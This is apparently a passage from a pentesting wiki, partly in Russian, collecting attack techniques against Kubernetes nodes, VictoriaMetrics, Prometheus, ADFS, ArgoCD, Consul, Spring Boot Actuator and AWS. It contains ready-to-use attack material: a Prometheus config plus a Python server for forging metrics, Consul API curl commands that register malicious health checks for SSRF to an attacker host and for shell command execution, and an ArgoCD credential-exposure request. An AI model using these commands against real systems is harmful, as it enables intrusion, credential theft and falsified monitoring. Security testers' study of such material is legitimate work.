Node Post-Exploitation

After escaping to the worker node, you will have access to all containers located on it.

The noscript can-they.sh will automatically get the tokens of other pods and check if they have the permission you are looking for (instead of you looking 1 by 1):

./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"// Some code

VictoriaMetrics

Если вы нашли кластер VictoriaMetrics, компоненты которого не закрыты за vmauth (сервис для аутха и проксирования к другим компонентам вики), то имеется возможность не только просматривать все собираемые метрики, но и подделывать их путем пуша своих

1) Поднимаем свой prometheus в конфигурации которого указываем

global:
  scrape_interval: 10s

scrape_configs:
  - job_name: 'redteam'
    metrics_path: /metrics
    static_configs:
      - targets: ['redteam.ru:9100'] # target, который мы хотим подделать

remote_write:
  - url: "http://host:8429/api/v1/write" # сервис, принимающий метрики, например vmagent

В контейнере с prometheus добавляем в /etc/hosts/ запись для redteam.ru, указывающую на наш веб с метриками

2) Поднимаем веб, который будет отдавать поддельные метрики

import http.server
import socketserver

PORT = 9100
METRICS = """
# HELP cpu_usage Test metric
# TYPE cpu_usage gauge
cpu_usage{job="redteam"} 0.64
""".encode('utf-8')

class MetricsHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/metrics':
            self.send_response(200)
            self.send_header("Content-type", "text/plain; version=0.0.4; charset=utf-8")
            self.end_headers()
            self.wfile.write(METRICS)
        else:
            self.send_response(404)
            self.end_headers()

with socketserver.TCPServer(("", PORT), MetricsHandler) as httpd:
    print("serving metrics at port", PORT)
    httpd.serve_forever()

3) Каждые 10 секунд прометей будет ходить за метриками и отдавать их по пути указанному в remote_write

Таким образом можно указать как уже существующий job_name, так и существующий для него target и внедриться в информацию, которая отобразится в Grafana для определенного instance

ADFS Post-Exploitation

How to access cloud systems outside domain - Introduction to the SAML attack against ADFS

Tools

* ADFSDump - Dump decryption private keys and other sorts of goodies from AD FS

* ADFSpoof - A python tool to forge AD FS security tokens

Prometheus pentest

Exposed administration interfaces

Prometheus provides an optional management API which can be enabled via the command line flags web.enable-admin-api and web.enable-lifecycle. These endpoints allow deletion of all saved metrics and shutting down of the monitoring server, respectively.

The endpoints are disabled by default, but in a non-secure deployment, an attacker can query the status of these settings from the API endpoint /api/v1/status/flags to check if they have been manually enabled:

{
    "status": "success",
        "data": {
            "web.enable-admin-api": "true",
            "web.enable-lifecycle": "false",
        }
}

Targets disclosure

API endpoint /api/v1/targets exposes services belonging to the infrastructure, including their roles and labels. the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its denoscription, but various cloud platforms may automatically expose sensitive data in these labels

e.g dangerous labels with possible sensitive information disclosure:

__meta_gce_metadata_ssh_keys
__meta_gce_metadata_startup_noscript
__meta_gce_metadata_kube_env
_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration

Articles:
* Don’t let Prometheus Steal your Fire
* How attackers use exposed Prometheus server to exploit Kubernetes clusters

ArgoCD - Declarative, GitOps tool for continuous delivery on Kubernetes

Template for deploying pod and code execution within a cluster - Link

CVE-2024-31989

* Use of Risky or Missing Cryptographic Algorithms in Redis Cache (Summary & PoC)
* Redis or Not – Revealing a Critical Vulnerability in Argo CD Kubernetes Controller

CVE-2025-55190

Argo CD's Project API Token Exposes Repository Credentials

curl -sH "Authorization: Bearer $ARGOCD_API_TOKEN" \
  "https://argocd.example.com/api/v1/projects/myProject/detailed"

Hardening

* Six Critical Blindspots While Securing Argo CD
* Securing Multi-Cluster ArgoCD
* Securing Continuous Delivery: Argo CD Threat Detection

Consul

SSRF
Register agent

curl -X PUT -H "Content-Type: application/json" -d '{
  "ID": "testservice",
  "Name": "testservice",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "HTTP": "http://attackerIp:attackerPort",
    "interval": "10s"
  }
}' http://consul-host:8500/v1/agent/service/register

RCE
Register agent

curl -X PUT -H "Content-Type: application/json" -d '{
  "ID": "testservice",
  "Name": "testservice",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "Args": ["/bin/sh", "-c", "id"],
    "interval": "10s"
  }
}' http://consul-host:8500/v1/agent/service/register

Agents
Get check output

curl http://consul-host:8500/v1/agent/checks | jq

Unregister agent

curl http://consul-host:8500/v1/agent/service/deregister/testservice -X PUT

Article - Consul by HashiCorp: from Infoleak to RCE

Spring Boot Actuator

Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations

* What makes Spring Boot Actuator a treasure trove for attackers?

* Common Misconfigurations in Spring Boot Actuator
#1 Exposed HeapDump file
#2 Exposed Actuator Gateway Endpoint leading to RCE
#3 Exposed env endpoint

* How Can Organizations Defend Themselves?

Recon

* /actuator - List of all available actuator endpoints

* /actuator/mappings - All URL mappings controllers and handlers), request → method mappings

* /actuator/beans - Shows registered Spring beans

* /actuator/configprops - Values and sources ConfigurationProperties

Exploitation

* /actuator/heapdump - Exposed HeapDump file

* /actuator/env - Expose details about the runtime environment

* /actuator/httptrace - Leakage of payload structures, internal URLs, possible query data

* /actuator/loggers - Shows current logging levels and (if enabled) allows you to change logger levels at runtime

* /actuator/gateway/routes - Ssrf, can lead to rce (cve-2022-22947)

AWS pwn

A collection of noscripts for AWS penetration testing. Contains sets of noscripts for

* Reconnaissance - Things to do with pre-compromise information gathering.

* Exploitation - Things that will help you gain a foothold in an account.

* Stealth - Things that might help you stay hidden after compromising an account.

* Exploration - Things to help you understand what you've pwned.

* Elevation - Things to help you move around an account and gather different levels of access.

* Persistence - Things to help maintain your access to an acccount.

* Exfiltration - Things to help you extract and move data around in AWSy ways.